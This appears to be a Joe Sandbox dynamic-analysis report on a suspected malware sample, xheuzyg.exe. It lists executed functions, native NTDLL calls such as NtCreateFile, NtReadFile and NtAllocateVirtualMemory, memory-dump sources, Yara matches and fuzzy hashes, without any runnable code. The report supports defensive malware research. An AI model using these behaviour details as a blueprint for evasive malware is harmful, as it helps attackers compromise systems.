Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
Instruction ID: 10ad830b254699740e1bffb8d76a5a4a8e745c388e7cefb8e0387406f1e14244
Opcode Fuzzy Hash: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
Instruction Fuzzy Hash: DC519C61A1D602D6DB177B58C901BFA7BE0EBA4B40F304D6CE096812E9EF35CCD19A46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xheuzyg.exePID: 1664, Parent PID: 1356COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	5.9%
Total number of Nodes:	555
Total number of Limit Nodes:	64

Executed Functions

Function 0041A3A2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 89
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

IA, xrefs: 0041A3CC, 0041A3D8
bMA, xrefs: 0041A422, 0041A430
!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A43D, 0041A444

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID: IA$!JA$bMA$bMA
API String ID: 3388366904-3023253649
Opcode ID: ef7624f14657ae611ed1c445d35104c046452ee4e5fc1cf42d46905f68572af3
Instruction ID: 1a44a0a510cf16399a68b9b0310e6076a598617947eea34bc7ac572c0acf3d52
Opcode Fuzzy Hash: ef7624f14657ae611ed1c445d35104c046452ee4e5fc1cf42d46905f68572af3
Instruction Fuzzy Hash: 9921F5B6204149AFCB08CF99DC80DEB77E9EF8C318B158209FA5DD3241C634E861CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A43D, 0041A444

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: f5d69c3174e05bc86a178109d856cb3914d6d29a394158b171a444bda948698b
Instruction ID: 7b8c6c5140b2d318d394f7ddcf17d6bf2d253b3bb880768854d18de2509a359f
Opcode Fuzzy Hash: f5d69c3174e05bc86a178109d856cb3914d6d29a394158b171a444bda948698b
Instruction Fuzzy Hash: BB0140B2200104AFCB14DF99DC85EEB77ADEF8C724F058659FA2D97281C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A43D, 0041A444

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A34B Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 12cfcb5ea174877c90f8108286c61aa96043635341142e2dafce63182e3f7af1
Instruction ID: 97d521f3626620c096edecc184fb90f6272adae795417988079d4a02fc26e4a1
Opcode Fuzzy Hash: 12cfcb5ea174877c90f8108286c61aa96043635341142e2dafce63182e3f7af1
Instruction Fuzzy Hash: D401BDB2201208AFCB08CF88DC84EEB77A9BF8C754F158258FA1DD7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c3a23ac7127e698266cb2f4e173484c54ba19efb84b06eed4f5965f467362df6
Instruction ID: dd1da3696fa03a6d26d92ec62aa55cd00a5fa1e1564089ef81c715d3fca0ead0
Opcode Fuzzy Hash: c3a23ac7127e698266cb2f4e173484c54ba19efb84b06eed4f5965f467362df6
Instruction Fuzzy Hash: 6BF08CB1200108AFDB14EF89CC81EEB77ADAF88354F158649FE4C97242C230E820CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A47F Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 270d311a7600dcd56849dc1e0cd5c82fe772fe242933ef6b8e54a407a65ea76c
Instruction ID: 53df6d64d5a5c75025c56b926d511475e16801676c3c5ace426f8197d8ce34cc
Opcode Fuzzy Hash: 270d311a7600dcd56849dc1e0cd5c82fe772fe242933ef6b8e54a407a65ea76c
Instruction Fuzzy Hash: 80D05EA940A2C04FCB11EAB465D10D67B80EE512287245E8EE4AC47607D168D21A9295

Uniqueness

Uniqueness Score: -1.00%

Function 01602B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602B6A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 958cddbf3d6e232a9c81c8180100464fcb18244e2ef11a7e3c65bc96c14f0862
Instruction ID: cc6772eee3023c37651a253ab303df0c86434677886ffd2426b4bd24435d2d6f
Opcode Fuzzy Hash: 958cddbf3d6e232a9c81c8180100464fcb18244e2ef11a7e3c65bc96c14f0862
Instruction Fuzzy Hash: 5990026224240003410575584814617500E97E1201B59C021E5014690EC62589916225

Uniqueness

Uniqueness Score: -1.00%

Function 01602BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602BFA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7001255cb872f985a69a667dd7899c8ba86ff0b4e0c0b6b7901eafe6f7776dc5
Instruction ID: 39f8fd8eb0efb983ac405cc96e45d8d5006029c378a79eed280911006b83abc9
Opcode Fuzzy Hash: 7001255cb872f985a69a667dd7899c8ba86ff0b4e0c0b6b7901eafe6f7776dc5
Instruction Fuzzy Hash: DA90023224140803D1807558480464B100997D2301F99C015A4025754ECB158B5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 01602AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602ADA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98cb23ae960a0a2c87b11e46f5b63d8e349783e18ba86330c019101571d52258
Instruction ID: 170f5f321bffd927bff6be1d05a890295c4c69ffd8b958f6c64e93a1eb1a69e8
Opcode Fuzzy Hash: 98cb23ae960a0a2c87b11e46f5b63d8e349783e18ba86330c019101571d52258
Instruction Fuzzy Hash: 7A900226251400030105B9580B04507104A97D6351359C021F5015650DD72189615221

Uniqueness

Uniqueness Score: -1.00%

Function 01602D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602D3A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66ca47f5f369f8408d92d60a38f2cd188df4ff3c8d558ec120a0dc1928c2161b
Instruction ID: 86355e84d4ab19dbf5598ce07d49d66b8cfd40521236cdd1402fe483bfe67d2b
Opcode Fuzzy Hash: 66ca47f5f369f8408d92d60a38f2cd188df4ff3c8d558ec120a0dc1928c2161b
Instruction Fuzzy Hash: B990022234140003D140755858186075009E7E2301F59D011E4414654DDA1589565322

Uniqueness

Uniqueness Score: -1.00%

Function 01602D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602D1A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6a1fd7eaf1fcf1f30453e26ecc5f235124ab5ab21784645f0851cee41d1969a
Instruction ID: 0425915a1679dd19d10d01ecb2a2e38c49344ca2a805fe3e49f79e16317e102f
Opcode Fuzzy Hash: d6a1fd7eaf1fcf1f30453e26ecc5f235124ab5ab21784645f0851cee41d1969a
Instruction Fuzzy Hash: E490022A25340003D1807558580860B100997D2202F99D415A4015658DCA1589695321

Uniqueness

Uniqueness Score: -1.00%

Function 01602DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602DFA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22f7c06e89acafdd6c7c62605d1441d1b6341de81ad03b5d676d7919b765093d
Instruction ID: 0c854555e284bd947f17eb26876b6b384b559a178313efbb4526e97084c21e14
Opcode Fuzzy Hash: 22f7c06e89acafdd6c7c62605d1441d1b6341de81ad03b5d676d7919b765093d
Instruction Fuzzy Hash: 3790023224140413D11175584904707100D97D1241F99C412A4424658ED7568A52A221

Uniqueness

Uniqueness Score: -1.00%

Function 01602DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602DDA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: becd7720002113ce1cfdc753768c9b30a688a519a03f60043aabe287ce96b267
Instruction ID: 353cff818ffbccba50bfc541d0719187fd0b03b7a40c99d0ff4b973762542089
Opcode Fuzzy Hash: becd7720002113ce1cfdc753768c9b30a688a519a03f60043aabe287ce96b267
Instruction Fuzzy Hash: 8E900222282441535545B5584804507500AA7E1241799C012A5414A50DC6269956D721

Uniqueness

Uniqueness Score: -1.00%

Function 01602C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602C7A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9aa4e0d031b1add26ac435d9bf66b80b0c5af53dd7a31005178eca867fe5384
Instruction ID: b3c95b652971c550d844ffedf07341ba9888aef4e832a9abb7ceb07595d23dfd
Opcode Fuzzy Hash: f9aa4e0d031b1add26ac435d9bf66b80b0c5af53dd7a31005178eca867fe5384
Instruction Fuzzy Hash: 4990023224148803D1107558880474B100997D1301F5DC411A8424758EC79589917221

Uniqueness

Uniqueness Score: -1.00%

Function 01602CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602CAA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42621fb00b53f73ec6a3f8054c53c8952bcd1e2cfab2b8182ff06b7b934c81cb
Instruction ID: f527a65cef32d5a03bd24e348d59c17a5f75ad9a6c6fd5389b46ef4775ec22c7
Opcode Fuzzy Hash: 42621fb00b53f73ec6a3f8054c53c8952bcd1e2cfab2b8182ff06b7b934c81cb
Instruction Fuzzy Hash: DC90023224140403D10079985808647100997E1301F59D011A9024655FC76589916231

Uniqueness

Uniqueness Score: -1.00%

Function 01602F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602F3A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc9252fbff943c6c1c8a6733483737755879bd88637affe8f05a9cb8e41dc295
Instruction ID: e21d79855a46875b1d87a94b8491b30daa5a3825c019653a9997ca0ad9d71958
Opcode Fuzzy Hash: dc9252fbff943c6c1c8a6733483737755879bd88637affe8f05a9cb8e41dc295
Instruction Fuzzy Hash: 5B90026238140443D10075584814B071009D7E2301F59C015E5064654EC719CD526226

Uniqueness

Uniqueness Score: -1.00%

Function 01602FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602FEA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 452224992f5ce840715d346d0c524b02169f87596983d5ddc04a9559cb8e6351
Instruction ID: 7cbebe112fec2ec145f909fe72e360eff31e2882b34c7622b71710ddddf42f8e
Opcode Fuzzy Hash: 452224992f5ce840715d346d0c524b02169f87596983d5ddc04a9559cb8e6351
Instruction Fuzzy Hash: 88900222251C0043D20079684C14B07100997D1303F59C115A4154654DCA1589615621

Uniqueness

Uniqueness Score: -1.00%

Function 01602FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602FBA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 295ae26f9054fa110f7f9b2a66a11889111e5173965cc6c1c9a2a952c0362d06
Instruction ID: 59c96e3eca09673613f5e6e29a4be2fbafe05b5cd7561096641908a7aa111efd
Opcode Fuzzy Hash: 295ae26f9054fa110f7f9b2a66a11889111e5173965cc6c1c9a2a952c0362d06
Instruction Fuzzy Hash: 5590022264140043414075688C449075009BBE2211759C121A4998650EC65989655765

Uniqueness

Uniqueness Score: -1.00%

Function 01602F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602F9A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c9365b7d1483057c948edb245bf4a2062fbfd5b9a43770ade9861d34ffefdc03
Instruction ID: e68e98991a6cb8e10e815be46482bedd9f77cb8032fe7f6d39f015efa829dd24
Opcode Fuzzy Hash: c9365b7d1483057c948edb245bf4a2062fbfd5b9a43770ade9861d34ffefdc03
Instruction Fuzzy Hash: 8B90023224180403D10075584C1470B100997D1302F59C011A5164655EC72589516671

Uniqueness

Uniqueness Score: -1.00%

Function 01602EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602EAA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca0c3518a79c8fce2b99b9eff719a3e3137dd46682e4bffaefc21d66c9c97664
Instruction ID: 2bb6ec7419c100c8098e4d751a50803d846bdb680b651bdc4038b85f6414519b
Opcode Fuzzy Hash: ca0c3518a79c8fce2b99b9eff719a3e3137dd46682e4bffaefc21d66c9c97664
Instruction Fuzzy Hash: D390027224140403D14075584804747100997D1301F59C011A9064654FC7598ED56765

Uniqueness

Uniqueness Score: -1.00%

Function 01602E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602E8A

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f879cc00cfa0edfbc27543e8983998a531abe758db353200517f9f59b049f00f
Instruction ID: 514aafae257bfcdd6424b5ad0bbf40522370f25934480a7b72dcb95d56972a7c
Opcode Fuzzy Hash: f879cc00cfa0edfbc27543e8983998a531abe758db353200517f9f59b049f00f
Instruction Fuzzy Hash: E790022264140503D10175584804617100E97D1241F99C022A5024655FCB258A92A231

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

